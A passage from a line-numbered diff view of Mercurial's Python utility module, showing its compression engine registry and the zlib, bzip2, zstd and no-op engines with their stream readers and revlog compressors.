3293 engine = self._engines[self._bundletypes[bundletype]]
3284 if not engine.available():
3294 if not engine.available():
3285 raise error.Abort(_('compression engine %s could not be loaded') %
3295 raise error.Abort(_('compression engine %s could not be loaded') %
3286 engine.name())
3296 engine.name())
3287 return engine
3297 return engine
3288
3298
3289 def supportedwireengines(self, role, onlyavailable=True):
3299 def supportedwireengines(self, role, onlyavailable=True):
3290 """Obtain compression engines that support the wire protocol.
3300 """Obtain compression engines that support the wire protocol.
3291
3301
3292 Returns a list of engines in prioritized order, most desired first.
3302 Returns a list of engines in prioritized order, most desired first.
3293
3303
3294 If ``onlyavailable`` is set, filter out engines that can't be
3304 If ``onlyavailable`` is set, filter out engines that can't be
3295 loaded.
3305 loaded.
3296 """
3306 """
3297 assert role in (SERVERROLE, CLIENTROLE)
3307 assert role in (SERVERROLE, CLIENTROLE)
3298
3308
3299 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3309 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3300
3310
3301 engines = [self._engines[e] for e in self._wiretypes.values()]
3311 engines = [self._engines[e] for e in self._wiretypes.values()]
3302 if onlyavailable:
3312 if onlyavailable:
3303 engines = [e for e in engines if e.available()]
3313 engines = [e for e in engines if e.available()]
3304
3314
3305 def getkey(e):
3315 def getkey(e):
3306 # Sort first by priority, highest first. In case of tie, sort
3316 # Sort first by priority, highest first. In case of tie, sort
3307 # alphabetically. This is arbitrary, but ensures output is
3317 # alphabetically. This is arbitrary, but ensures output is
3308 # stable.
3318 # stable.
3309 w = e.wireprotosupport()
3319 w = e.wireprotosupport()
3310 return -1 * getattr(w, attr), w.name
3320 return -1 * getattr(w, attr), w.name
3311
3321
3312 return list(sorted(engines, key=getkey))
3322 return list(sorted(engines, key=getkey))
3313
3323
3314 def forwiretype(self, wiretype):
3324 def forwiretype(self, wiretype):
3315 engine = self._engines[self._wiretypes[wiretype]]
3325 engine = self._engines[self._wiretypes[wiretype]]
3316 if not engine.available():
3326 if not engine.available():
3317 raise error.Abort(_('compression engine %s could not be loaded') %
3327 raise error.Abort(_('compression engine %s could not be loaded') %
3318 engine.name())
3328 engine.name())
3319 return engine
3329 return engine
3320
3330
3321 def forrevlogheader(self, header):
3331 def forrevlogheader(self, header):
3322 """Obtain a compression engine registered to a revlog header.
3332 """Obtain a compression engine registered to a revlog header.
3323
3333
3324 Will raise KeyError if the revlog header value isn't registered.
3334 Will raise KeyError if the revlog header value isn't registered.
3325 """
3335 """
3326 return self._engines[self._revlogheaders[header]]
3336 return self._engines[self._revlogheaders[header]]
3327
3337
3328 compengines = compressormanager()
3338 compengines = compressormanager()
3329
3339
3330 class compressionengine(object):
3340 class compressionengine(object):
3331 """Base class for compression engines.
3341 """Base class for compression engines.
3332
3342
3333 Compression engines must implement the interface defined by this class.
3343 Compression engines must implement the interface defined by this class.
3334 """
3344 """
3335 def name(self):
3345 def name(self):
3336 """Returns the name of the compression engine.
3346 """Returns the name of the compression engine.
3337
3347
3338 This is the key the engine is registered under.
3348 This is the key the engine is registered under.
3339
3349
3340 This method must be implemented.
3350 This method must be implemented.
3341 """
3351 """
3342 raise NotImplementedError()
3352 raise NotImplementedError()
3343
3353
3344 def available(self):
3354 def available(self):
3345 """Whether the compression engine is available.
3355 """Whether the compression engine is available.
3346
3356
3347 The intent of this method is to allow optional compression engines
3357 The intent of this method is to allow optional compression engines
3348 that may not be available in all installations (such as engines relying
3358 that may not be available in all installations (such as engines relying
3349 on C extensions that may not be present).
3359 on C extensions that may not be present).
3350 """
3360 """
3351 return True
3361 return True
3352
3362
3353 def bundletype(self):
3363 def bundletype(self):
3354 """Describes bundle identifiers for this engine.
3364 """Describes bundle identifiers for this engine.
3355
3365
3356 If this compression engine isn't supported for bundles, returns None.
3366 If this compression engine isn't supported for bundles, returns None.
3357
3367
3358 If this engine can be used for bundles, returns a 2-tuple of strings of
3368 If this engine can be used for bundles, returns a 2-tuple of strings of
3359 the user-facing "bundle spec" compression name and an internal
3369 the user-facing "bundle spec" compression name and an internal
3360 identifier used to denote the compression format within bundles. To
3370 identifier used to denote the compression format within bundles. To
3361 exclude the name from external usage, set the first element to ``None``.
3371 exclude the name from external usage, set the first element to ``None``.
3362
3372
3363 If bundle compression is supported, the class must also implement
3373 If bundle compression is supported, the class must also implement
3364 ``compressstream`` and `decompressorreader``.
3374 ``compressstream`` and `decompressorreader``.
3365
3375
3366 The docstring of this method is used in the help system to tell users
3376 The docstring of this method is used in the help system to tell users
3367 about this engine.
3377 about this engine.
3368 """
3378 """
3369 return None
3379 return None
3370
3380
3371 def wireprotosupport(self):
3381 def wireprotosupport(self):
3372 """Declare support for this compression format on the wire protocol.
3382 """Declare support for this compression format on the wire protocol.
3373
3383
3374 If this compression engine isn't supported for compressing wire
3384 If this compression engine isn't supported for compressing wire
3375 protocol payloads, returns None.
3385 protocol payloads, returns None.
3376
3386
3377 Otherwise, returns ``compenginewireprotosupport`` with the following
3387 Otherwise, returns ``compenginewireprotosupport`` with the following
3378 fields:
3388 fields:
3379
3389
3380 * String format identifier
3390 * String format identifier
3381 * Integer priority for the server
3391 * Integer priority for the server
3382 * Integer priority for the client
3392 * Integer priority for the client
3383
3393
3384 The integer priorities are used to order the advertisement of format
3394 The integer priorities are used to order the advertisement of format
3385 support by server and client. The highest integer is advertised
3395 support by server and client. The highest integer is advertised
3386 first. Integers with non-positive values aren't advertised.
3396 first. Integers with non-positive values aren't advertised.
3387
3397
3388 The priority values are somewhat arbitrary and only used for default
3398 The priority values are somewhat arbitrary and only used for default
3389 ordering. The relative order can be changed via config options.
3399 ordering. The relative order can be changed via config options.
3390
3400
3391 If wire protocol compression is supported, the class must also implement
3401 If wire protocol compression is supported, the class must also implement
3392 ``compressstream`` and ``decompressorreader``.
3402 ``compressstream`` and ``decompressorreader``.
3393 """
3403 """
3394 return None
3404 return None
3395
3405
3396 def revlogheader(self):
3406 def revlogheader(self):
3397 """Header added to revlog chunks that identifies this engine.
3407 """Header added to revlog chunks that identifies this engine.
3398
3408
3399 If this engine can be used to compress revlogs, this method should
3409 If this engine can be used to compress revlogs, this method should
3400 return the bytes used to identify chunks compressed with this engine.
3410 return the bytes used to identify chunks compressed with this engine.
3401 Else, the method should return ``None`` to indicate it does not
3411 Else, the method should return ``None`` to indicate it does not
3402 participate in revlog compression.
3412 participate in revlog compression.
3403 """
3413 """
3404 return None
3414 return None
3405
3415
3406 def compressstream(self, it, opts=None):
3416 def compressstream(self, it, opts=None):
3407 """Compress an iterator of chunks.
3417 """Compress an iterator of chunks.
3408
3418
3409 The method receives an iterator (ideally a generator) of chunks of
3419 The method receives an iterator (ideally a generator) of chunks of
3410 bytes to be compressed. It returns an iterator (ideally a generator)
3420 bytes to be compressed. It returns an iterator (ideally a generator)
3411 of bytes of chunks representing the compressed output.
3421 of bytes of chunks representing the compressed output.
3412
3422
3413 Optionally accepts an argument defining how to perform compression.
3423 Optionally accepts an argument defining how to perform compression.
3414 Each engine treats this argument differently.
3424 Each engine treats this argument differently.
3415 """
3425 """
3416 raise NotImplementedError()
3426 raise NotImplementedError()
3417
3427
3418 def decompressorreader(self, fh):
3428 def decompressorreader(self, fh):
3419 """Perform decompression on a file object.
3429 """Perform decompression on a file object.
3420
3430
3421 Argument is an object with a ``read(size)`` method that returns
3431 Argument is an object with a ``read(size)`` method that returns
3422 compressed data. Return value is an object with a ``read(size)`` that
3432 compressed data. Return value is an object with a ``read(size)`` that
3423 returns uncompressed data.
3433 returns uncompressed data.
3424 """
3434 """
3425 raise NotImplementedError()
3435 raise NotImplementedError()
3426
3436
3427 def revlogcompressor(self, opts=None):
3437 def revlogcompressor(self, opts=None):
3428 """Obtain an object that can be used to compress revlog entries.
3438 """Obtain an object that can be used to compress revlog entries.
3429
3439
3430 The object has a ``compress(data)`` method that compresses binary
3440 The object has a ``compress(data)`` method that compresses binary
3431 data. This method returns compressed binary data or ``None`` if
3441 data. This method returns compressed binary data or ``None`` if
3432 the data could not be compressed (too small, not compressible, etc).
3442 the data could not be compressed (too small, not compressible, etc).
3433 The returned data should have a header uniquely identifying this
3443 The returned data should have a header uniquely identifying this
3434 compression format so decompression can be routed to this engine.
3444 compression format so decompression can be routed to this engine.
3435 This header should be identified by the ``revlogheader()`` return
3445 This header should be identified by the ``revlogheader()`` return
3436 value.
3446 value.
3437
3447
3438 The object has a ``decompress(data)`` method that decompresses
3448 The object has a ``decompress(data)`` method that decompresses
3439 data. The method will only be called if ``data`` begins with
3449 data. The method will only be called if ``data`` begins with
3440 ``revlogheader()``. The method should return the raw, uncompressed
3450 ``revlogheader()``. The method should return the raw, uncompressed
3441 data or raise a ``RevlogError``.
3451 data or raise a ``RevlogError``.
3442
3452
3443 The object is reusable but is not thread safe.
3453 The object is reusable but is not thread safe.
3444 """
3454 """
3445 raise NotImplementedError()
3455 raise NotImplementedError()
3446
3456
3447 class _CompressedStreamReader(object):
3457 class _CompressedStreamReader(object):
3448 def __init__(self, fh):
3458 def __init__(self, fh):
3449 if safehasattr(fh, 'unbufferedread'):
3459 if safehasattr(fh, 'unbufferedread'):
3450 self._reader = fh.unbufferedread
3460 self._reader = fh.unbufferedread
3451 else:
3461 else:
3452 self._reader = fh.read
3462 self._reader = fh.read
3453 self._pending = []
3463 self._pending = []
3454 self._pos = 0
3464 self._pos = 0
3455 self._eof = False
3465 self._eof = False
3456
3466
3457 def _decompress(self, chunk):
3467 def _decompress(self, chunk):
3458 raise NotImplementedError()
3468 raise NotImplementedError()
3459
3469
3460 def read(self, l):
3470 def read(self, l):
3461 buf = []
3471 buf = []
3462 while True:
3472 while True:
3463 while self._pending:
3473 while self._pending:
3464 if len(self._pending[0]) > l + self._pos:
3474 if len(self._pending[0]) > l + self._pos:
3465 newbuf = self._pending[0]
3475 newbuf = self._pending[0]
3466 buf.append(newbuf[self._pos:self._pos + l])
3476 buf.append(newbuf[self._pos:self._pos + l])
3467 self._pos += l
3477 self._pos += l
3468 return ''.join(buf)
3478 return ''.join(buf)
3469
3479
3470 newbuf = self._pending.pop(0)
3480 newbuf = self._pending.pop(0)
3471 if self._pos:
3481 if self._pos:
3472 buf.append(newbuf[self._pos:])
3482 buf.append(newbuf[self._pos:])
3473 l -= len(newbuf) - self._pos
3483 l -= len(newbuf) - self._pos
3474 else:
3484 else:
3475 buf.append(newbuf)
3485 buf.append(newbuf)
3476 l -= len(newbuf)
3486 l -= len(newbuf)
3477 self._pos = 0
3487 self._pos = 0
3478
3488
3479 if self._eof:
3489 if self._eof:
3480 return ''.join(buf)
3490 return ''.join(buf)
3481 chunk = self._reader(65536)
3491 chunk = self._reader(65536)
3482 self._decompress(chunk)
3492 self._decompress(chunk)
3483 if not chunk and not self._pending and not self._eof:
3493 if not chunk and not self._pending and not self._eof:
3484 # No progress and no new data, bail out
3494 # No progress and no new data, bail out
3485 return ''.join(buf)
3495 return ''.join(buf)
3486
3496
3487 class _GzipCompressedStreamReader(_CompressedStreamReader):
3497 class _GzipCompressedStreamReader(_CompressedStreamReader):
3488 def __init__(self, fh):
3498 def __init__(self, fh):
3489 super(_GzipCompressedStreamReader, self).__init__(fh)
3499 super(_GzipCompressedStreamReader, self).__init__(fh)
3490 self._decompobj = zlib.decompressobj()
3500 self._decompobj = zlib.decompressobj()
3491 def _decompress(self, chunk):
3501 def _decompress(self, chunk):
3492 newbuf = self._decompobj.decompress(chunk)
3502 newbuf = self._decompobj.decompress(chunk)
3493 if newbuf:
3503 if newbuf:
3494 self._pending.append(newbuf)
3504 self._pending.append(newbuf)
3495 d = self._decompobj.copy()
3505 d = self._decompobj.copy()
3496 try:
3506 try:
3497 d.decompress('x')
3507 d.decompress('x')
3498 d.flush()
3508 d.flush()
3499 if d.unused_data == 'x':
3509 if d.unused_data == 'x':
3500 self._eof = True
3510 self._eof = True
3501 except zlib.error:
3511 except zlib.error:
3502 pass
3512 pass
3503
3513
3504 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3514 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3505 def __init__(self, fh):
3515 def __init__(self, fh):
3506 super(_BZ2CompressedStreamReader, self).__init__(fh)
3516 super(_BZ2CompressedStreamReader, self).__init__(fh)
3507 self._decompobj = bz2.BZ2Decompressor()
3517 self._decompobj = bz2.BZ2Decompressor()
3508 def _decompress(self, chunk):
3518 def _decompress(self, chunk):
3509 newbuf = self._decompobj.decompress(chunk)
3519 newbuf = self._decompobj.decompress(chunk)
3510 if newbuf:
3520 if newbuf:
3511 self._pending.append(newbuf)
3521 self._pending.append(newbuf)
3512 try:
3522 try:
3513 while True:
3523 while True:
3514 newbuf = self._decompobj.decompress('')
3524 newbuf = self._decompobj.decompress('')
3515 if newbuf:
3525 if newbuf:
3516 self._pending.append(newbuf)
3526 self._pending.append(newbuf)
3517 else:
3527 else:
3518 break
3528 break
3519 except EOFError:
3529 except EOFError:
3520 self._eof = True
3530 self._eof = True
3521
3531
3522 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3532 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3523 def __init__(self, fh):
3533 def __init__(self, fh):
3524 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3534 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3525 newbuf = self._decompobj.decompress('BZ')
3535 newbuf = self._decompobj.decompress('BZ')
3526 if newbuf:
3536 if newbuf:
3527 self._pending.append(newbuf)
3537 self._pending.append(newbuf)
3528
3538
3529 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3539 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3530 def __init__(self, fh, zstd):
3540 def __init__(self, fh, zstd):
3531 super(_ZstdCompressedStreamReader, self).__init__(fh)
3541 super(_ZstdCompressedStreamReader, self).__init__(fh)
3532 self._zstd = zstd
3542 self._zstd = zstd
3533 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3543 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3534 def _decompress(self, chunk):
3544 def _decompress(self, chunk):
3535 newbuf = self._decompobj.decompress(chunk)
3545 newbuf = self._decompobj.decompress(chunk)
3536 if newbuf:
3546 if newbuf:
3537 self._pending.append(newbuf)
3547 self._pending.append(newbuf)
3538 try:
3548 try:
3539 while True:
3549 while True:
3540 newbuf = self._decompobj.decompress('')
3550 newbuf = self._decompobj.decompress('')
3541 if newbuf:
3551 if newbuf:
3542 self._pending.append(newbuf)
3552 self._pending.append(newbuf)
3543 else:
3553 else:
3544 break
3554 break
3545 except self._zstd.ZstdError:
3555 except self._zstd.ZstdError:
3546 self._eof = True
3556 self._eof = True
3547
3557
3548 class _zlibengine(compressionengine):
3558 class _zlibengine(compressionengine):
3549 def name(self):
3559 def name(self):
3550 return 'zlib'
3560 return 'zlib'
3551
3561
3552 def bundletype(self):
3562 def bundletype(self):
3553 """zlib compression using the DEFLATE algorithm.
3563 """zlib compression using the DEFLATE algorithm.
3554
3564
3555 All Mercurial clients should support this format. The compression
3565 All Mercurial clients should support this format. The compression
3556 algorithm strikes a reasonable balance between compression ratio
3566 algorithm strikes a reasonable balance between compression ratio
3557 and size.
3567 and size.
3558 """
3568 """
3559 return 'gzip', 'GZ'
3569 return 'gzip', 'GZ'
3560
3570
3561 def wireprotosupport(self):
3571 def wireprotosupport(self):
3562 return compewireprotosupport('zlib', 20, 20)
3572 return compewireprotosupport('zlib', 20, 20)
3563
3573
3564 def revlogheader(self):
3574 def revlogheader(self):
3565 return 'x'
3575 return 'x'
3566
3576
3567 def compressstream(self, it, opts=None):
3577 def compressstream(self, it, opts=None):
3568 opts = opts or {}
3578 opts = opts or {}
3569
3579
3570 z = zlib.compressobj(opts.get('level', -1))
3580 z = zlib.compressobj(opts.get('level', -1))
3571 for chunk in it:
3581 for chunk in it:
3572 data = z.compress(chunk)
3582 data = z.compress(chunk)
3573 # Not all calls to compress emit data. It is cheaper to inspect
3583 # Not all calls to compress emit data. It is cheaper to inspect
3574 # here than to feed empty chunks through generator.
3584 # here than to feed empty chunks through generator.
3575 if data:
3585 if data:
3576 yield data
3586 yield data
3577
3587
3578 yield z.flush()
3588 yield z.flush()
3579
3589
3580 def decompressorreader(self, fh):
3590 def decompressorreader(self, fh):
3581 return _GzipCompressedStreamReader(fh)
3591 return _GzipCompressedStreamReader(fh)
3582
3592
3583 class zlibrevlogcompressor(object):
3593 class zlibrevlogcompressor(object):
3584 def compress(self, data):
3594 def compress(self, data):
3585 insize = len(data)
3595 insize = len(data)
3586 # Caller handles empty input case.
3596 # Caller handles empty input case.
3587 assert insize > 0
3597 assert insize > 0
3588
3598
3589 if insize < 44:
3599 if insize < 44:
3590 return None
3600 return None
3591
3601
3592 elif insize <= 1000000:
3602 elif insize <= 1000000:
3593 compressed = zlib.compress(data)
3603 compressed = zlib.compress(data)
3594 if len(compressed) < insize:
3604 if len(compressed) < insize:
3595 return compressed
3605 return compressed
3596 return None
3606 return None
3597
3607
3598 # zlib makes an internal copy of the input buffer, doubling
3608 # zlib makes an internal copy of the input buffer, doubling
3599 # memory usage for large inputs. So do streaming compression
3609 # memory usage for large inputs. So do streaming compression
3600 # on large inputs.
3610 # on large inputs.
3601 else:
3611 else:
3602 z = zlib.compressobj()
3612 z = zlib.compressobj()
3603 parts = []
3613 parts = []
3604 pos = 0
3614 pos = 0
3605 while pos < insize:
3615 while pos < insize:
3606 pos2 = pos + 2**20
3616 pos2 = pos + 2**20
3607 parts.append(z.compress(data[pos:pos2]))
3617 parts.append(z.compress(data[pos:pos2]))
3608 pos = pos2
3618 pos = pos2
3609 parts.append(z.flush())
3619 parts.append(z.flush())
3610
3620
3611 if sum(map(len, parts)) < insize:
3621 if sum(map(len, parts)) < insize:
3612 return ''.join(parts)
3622 return ''.join(parts)
3613 return None
3623 return None
3614
3624
3615 def decompress(self, data):
3625 def decompress(self, data):
3616 try:
3626 try:
3617 return zlib.decompress(data)
3627 return zlib.decompress(data)
3618 except zlib.error as e:
3628 except zlib.error as e:
3619 raise error.RevlogError(_('revlog decompress error: %s') %
3629 raise error.RevlogError(_('revlog decompress error: %s') %
3620 stringutil.forcebytestr(e))
3630 stringutil.forcebytestr(e))
3621
3631
3622 def revlogcompressor(self, opts=None):
3632 def revlogcompressor(self, opts=None):
3623 return self.zlibrevlogcompressor()
3633 return self.zlibrevlogcompressor()
3624
3634
3625 compengines.register(_zlibengine())
3635 compengines.register(_zlibengine())
3626
3636
3627 class _bz2engine(compressionengine):
3637 class _bz2engine(compressionengine):
3628 def name(self):
3638 def name(self):
3629 return 'bz2'
3639 return 'bz2'
3630
3640
3631 def bundletype(self):
3641 def bundletype(self):
3632 """An algorithm that produces smaller bundles than ``gzip``.
3642 """An algorithm that produces smaller bundles than ``gzip``.
3633
3643
3634 All Mercurial clients should support this format.
3644 All Mercurial clients should support this format.
3635
3645
3636 This engine will likely produce smaller bundles than ``gzip`` but
3646 This engine will likely produce smaller bundles than ``gzip`` but
3637 will be significantly slower, both during compression and
3647 will be significantly slower, both during compression and
3638 decompression.
3648 decompression.
3639
3649
3640 If available, the ``zstd`` engine can yield similar or better
3650 If available, the ``zstd`` engine can yield similar or better
3641 compression at much higher speeds.
3651 compression at much higher speeds.
3642 """
3652 """
3643 return 'bzip2', 'BZ'
3653 return 'bzip2', 'BZ'
3644
3654
3645 # We declare a protocol name but don't advertise by default because
3655 # We declare a protocol name but don't advertise by default because
3646 # it is slow.
3656 # it is slow.
3647 def wireprotosupport(self):
3657 def wireprotosupport(self):
3648 return compewireprotosupport('bzip2', 0, 0)
3658 return compewireprotosupport('bzip2', 0, 0)
3649
3659
3650 def compressstream(self, it, opts=None):
3660 def compressstream(self, it, opts=None):
3651 opts = opts or {}
3661 opts = opts or {}
3652 z = bz2.BZ2Compressor(opts.get('level', 9))
3662 z = bz2.BZ2Compressor(opts.get('level', 9))
3653 for chunk in it:
3663 for chunk in it:
3654 data = z.compress(chunk)
3664 data = z.compress(chunk)
3655 if data:
3665 if data:
3656 yield data
3666 yield data
3657
3667
3658 yield z.flush()
3668 yield z.flush()
3659
3669
3660 def decompressorreader(self, fh):
3670 def decompressorreader(self, fh):
3661 return _BZ2CompressedStreamReader(fh)
3671 return _BZ2CompressedStreamReader(fh)
3662
3672
3663 compengines.register(_bz2engine())
3673 compengines.register(_bz2engine())
3664
3674
3665 class _truncatedbz2engine(compressionengine):
3675 class _truncatedbz2engine(compressionengine):
3666 def name(self):
3676 def name(self):
3667 return 'bz2truncated'
3677 return 'bz2truncated'
3668
3678
3669 def bundletype(self):
3679 def bundletype(self):
3670 return None, '_truncatedBZ'
3680 return None, '_truncatedBZ'
3671
3681
3672 # We don't implement compressstream because it is hackily handled elsewhere.
3682 # We don't implement compressstream because it is hackily handled elsewhere.
3673
3683
3674 def decompressorreader(self, fh):
3684 def decompressorreader(self, fh):
3675 return _TruncatedBZ2CompressedStreamReader(fh)
3685 return _TruncatedBZ2CompressedStreamReader(fh)
3676
3686
3677 compengines.register(_truncatedbz2engine())
3687 compengines.register(_truncatedbz2engine())
3678
3688
3679 class _noopengine(compressionengine):
3689 class _noopengine(compressionengine):
3680 def name(self):
3690 def name(self):
3681 return 'none'
3691 return 'none'
3682
3692
3683 def bundletype(self):
3693 def bundletype(self):
3684 """No compression is performed.
3694 """No compression is performed.
3685
3695
3686 Use this compression engine to explicitly disable compression.
3696 Use this compression engine to explicitly disable compression.
3687 """
3697 """
3688 return 'none', 'UN'
3698 return 'none', 'UN'
3689
3699
3690 # Clients always support uncompressed payloads. Servers don't because
3700 # Clients always support uncompressed payloads. Servers don't because
3691 # unless you are on a fast network, uncompressed payloads can easily
3701 # unless you are on a fast network, uncompressed payloads can easily
3692 # saturate your network pipe.
3702 # saturate your network pipe.
3693 def wireprotosupport(self):
3703 def wireprotosupport(self):
3694 return compewireprotosupport('none', 0, 10)
3704 return compewireprotosupport('none', 0, 10)
3695
3705
3696 # We don't implement revlogheader because it is handled specially
3706 # We don't implement revlogheader because it is handled specially
3697 # in the revlog class.
3707 # in the revlog class.
3698
3708
3699 def compressstream(self, it, opts=None):
3709 def compressstream(self, it, opts=None):
3700 return it
3710 return it
3701
3711
3702 def decompressorreader(self, fh):
3712 def decompressorreader(self, fh):
3703 return fh
3713 return fh
3704
3714
3705 class nooprevlogcompressor(object):
3715 class nooprevlogcompressor(object):
3706 def compress(self, data):
3716 def compress(self, data):
3707 return None
3717 return None
3708
3718
3709 def revlogcompressor(self, opts=None):
3719 def revlogcompressor(self, opts=None):
3710 return self.nooprevlogcompressor()
3720 return self.nooprevlogcompressor()
3711
3721
3712 compengines.register(_noopengine())
3722 compengines.register(_noopengine())
3713
3723
3714 class _zstdengine(compressionengine):
3724 class _zstdengine(compressionengine):
3715 def name(self):
3725 def name(self):
3716 return 'zstd'
3726 return 'zstd'
3717
3727
3718 @propertycache
3728 @propertycache
3719 def _module(self):
3729 def _module(self):
3720 # Not all installs have the zstd module available. So defer importing
3730 # Not all installs have the zstd module available. So defer importing
3721 # until first access.
3731 # until first access.
3722 try:
3732 try:
3723 from . import zstd
3733 from . import zstd
3724 # Force delayed import.
3734 # Force delayed import.
3725 zstd.__version__
3735 zstd.__version__
3726 return zstd
3736 return zstd
3727 except ImportError:
3737 except ImportError:
3728 return None
3738 return None
3729
3739
3730 def available(self):
3740 def available(self):
3731 return bool(self._module)
3741 return bool(self._module)
3732
3742
3733 def bundletype(self):
3743 def bundletype(self):
3734 """A modern compression algorithm that is fast and highly flexible.
3744 """A modern compression algorithm that is fast and highly flexible.
3735
3745
3736 Only supported by Mercurial 4.1 and newer clients.
3746 Only supported by Mercurial 4.1 and newer clients.
3737
3747
3738 With the default settings, zstd compression is both faster and yields
3748 With the default settings, zstd compression is both faster and yields
3739 better compression than ``gzip``. It also frequently yields better
3749 better compression than ``gzip``. It also frequently yields better
3740 compression than ``bzip2`` while operating at much higher speeds.
3750 compression than ``bzip2`` while operating at much higher speeds.
3741
3751
3742 If this engine is available and backwards compatibility is not a
3752 If this engine is available and backwards compatibility is not a
3743 concern, it is likely the best available engine.
3753 concern, it is likely the best available engine.
3744 """
3754 """
3745 return 'zstd', 'ZS'
3755 return 'zstd', 'ZS'
3746
3756
3747 def wireprotosupport(self):
3757 def wireprotosupport(self):
3748 return compewireprotosupport('zstd', 50, 50)
3758 return compewireprotosupport('zstd', 50, 50)
3749
3759
3750 def revlogheader(self):
3760 def revlogheader(self):
3751 return '\x28'
3761 return '\x28'
3752
3762
3753 def compressstream(self, it, opts=None):
3763 def compressstream(self, it, opts=None):
3754 opts = opts or {}
3764 opts = opts or {}
3755 # zstd level 3 is almost always significantly faster than zlib
3765 # zstd level 3 is almost always significantly faster than zlib
3756 # while providing no worse compression. It strikes a good balance
3766 # while providing no worse compression. It strikes a good balance
3757 # between speed and compression.
3767 # between speed and compression.
3758 level = opts.get('level', 3)
3768 level = opts.get('level', 3)
3759
3769
3760 zstd = self._module
3770 zstd = self._module
3761 z = zstd.ZstdCompressor(level=level).compressobj()
3771 z = zstd.ZstdCompressor(level=level).compressobj()
3762 for chunk in it:
3772 for chunk in it:
3763 data = z.compress(chunk)
3773 data = z.compress(chunk)
3764 if data:
3774 if data:
3765 yield data
3775 yield data
3766
3776
3767 yield z.flush()
3777 yield z.flush()
3768
3778
3769 def decompressorreader(self, fh):
3779 def decompressorreader(self, fh):
3770 return _ZstdCompressedStreamReader(fh, self._module)
3780 return _ZstdCompressedStreamReader(fh, self._module)
3771
3781
3772 class zstdrevlogcompressor(object):
3782 class zstdrevlogcompressor(object):
3773 def __init__(self, zstd, level=3):
3783 def __init__(self, zstd, level=3):
3774 # TODO consider omitting frame magic to save 4 bytes.
3784 # TODO consider omitting frame magic to save 4 bytes.
3775 # This writes content sizes into the frame header. That is
3785 # This writes content sizes into the frame header. That is
3776 # extra storage. But it allows a correct size memory allocation
3786 # extra storage. But it allows a correct size memory allocation
3777 # to hold the result.
3787 # to hold the result.
3778 self._cctx = zstd.ZstdCompressor(level=level)
3788 self._cctx = zstd.ZstdCompressor(level=level)
3779 self._dctx = zstd.ZstdDecompressor()
3789 self._dctx = zstd.ZstdDecompressor()
3780 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3790 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3781 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3791 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3782
3792
3783 def compress(self, data):
3793 def compress(self, data):
3784 insize = len(data)
3794 insize = len(data)
3785 # Caller handles empty input case.
3795 # Caller handles empty input case.
3786 assert insize > 0
3796 assert insize > 0
3787
3797
3788 if insize < 50:
3798 if insize < 50:
3789 return None
3799 return None
3790
3800
3791 elif insize <= 1000000:
3801 elif insize <= 1000000:
3792 compressed = self._cctx.compress(data)
3802 compressed = self._cctx.compress(data)
3793 if len(compressed) < insize:
3803 if len(compressed) < insize:
3794 return compressed
3804 return compressed
3795 return None
3805 return None
3796 else:
3806 else:
3797 z = self._cctx.compressobj()
3807 z = self._cctx.compressobj()
3798 chunks = []
3808 chunks = []
3799 pos = 0
3809 pos = 0
3800 while pos < insize:
3810 while pos < insize:
3801 pos2 = pos + self._compinsize
3811 pos2 = pos + self._compinsize
3802 chunk = z.compress(data[pos:pos2])
3812 chunk = z.compress(data[pos:pos2])
3803 if chunk:
3813 if chunk:
3804 chunks.append(chunk)
3814 chunks.append(chunk)
3805 pos = pos2
3815 pos = pos2
3806 chunks.append(z.flush())
3816 chunks.append(z.flush())
3807
3817
3808 if sum(map(len, chunks)) < insize:
3818 if sum(map(len, chunks)) < insize:
3809 return ''.join(chunks)
3819 return ''.join(chunks)
3810 return None
3820 return None
3811
3821
3812 def decompress(self, data):
3822 def decompress(self, data):
3813 insize = len(data)
3823 insize = len(data)
3814
3824
3815 try:
3825 try:
3816 # This was measured to be faster than other streaming
3826 # This was measured to be faster than other streaming
3817 # decompressors.
3827 # decompressors.
3818 dobj = self._dctx.decompressobj()
3828 dobj = self._dctx.decompressobj()
3819 chunks = []
3829 chunks = []
3820 pos = 0
3830 pos = 0
3821 while pos < insize:
3831 while pos < insize:
3822 pos2 = pos + self._decompinsize
3832 pos2 = pos + self._decompinsize
3823 chunk = dobj.decompress(data[pos:pos2])
3833 chunk = dobj.decompress(data[pos:pos2])
3824 if chunk:
3834 if chunk:
3825 chunks.append(chunk)
3835 chunks.append(chunk)
3826 pos = pos2
3836 pos = pos2
3827 # Frame should be exhausted, so no finish() API.
3837 # Frame should be exhausted, so no finish() API.
3828
3838
3829 return ''.join(chunks)
3839 return ''.join(chunks)
3830 except Exception as e:
3840 except Exception as e:
3831 raise error.RevlogError(_('revlog decompress error: %s') %
3841 raise error.RevlogError(_('revlog decompress error: %s') %
3832 stringutil.forcebytestr(e))
3842 stringutil.forcebytestr(e))
3833
3843
3834 def revlogcompressor(self, opts=None):
3844 def revlogcompressor(self, opts=None):
3835 opts = opts or {}
3845 opts = opts or {}
3836 return self.zstdrevlogcompressor(self._module,
3846 return self.zstdrevlogcompressor(self._module,
3837 level=opts.get('level', 3))
3847 level=opts.get('level', 3))
3838
3848
3839 compengines.register(_zstdengine())
3849 compengines.register(_zstdengine())
3840
3850
3841 def bundlecompressiontopics():
3851 def bundlecompressiontopics():
3842 """Obtains a list of available bundle compressions for use in help."""
3852 """Obtains a list of available bundle compressions for use in help."""
3843 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3853 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3844 items = {}
3854 items = {}
3845
3855
3846 # We need to format the docstring. So use a dummy object/type to hold it
3856 # We need to format the docstring. So use a dummy object/type to hold it
3847 # rather than mutating the original.
3857 # rather than mutating the original.
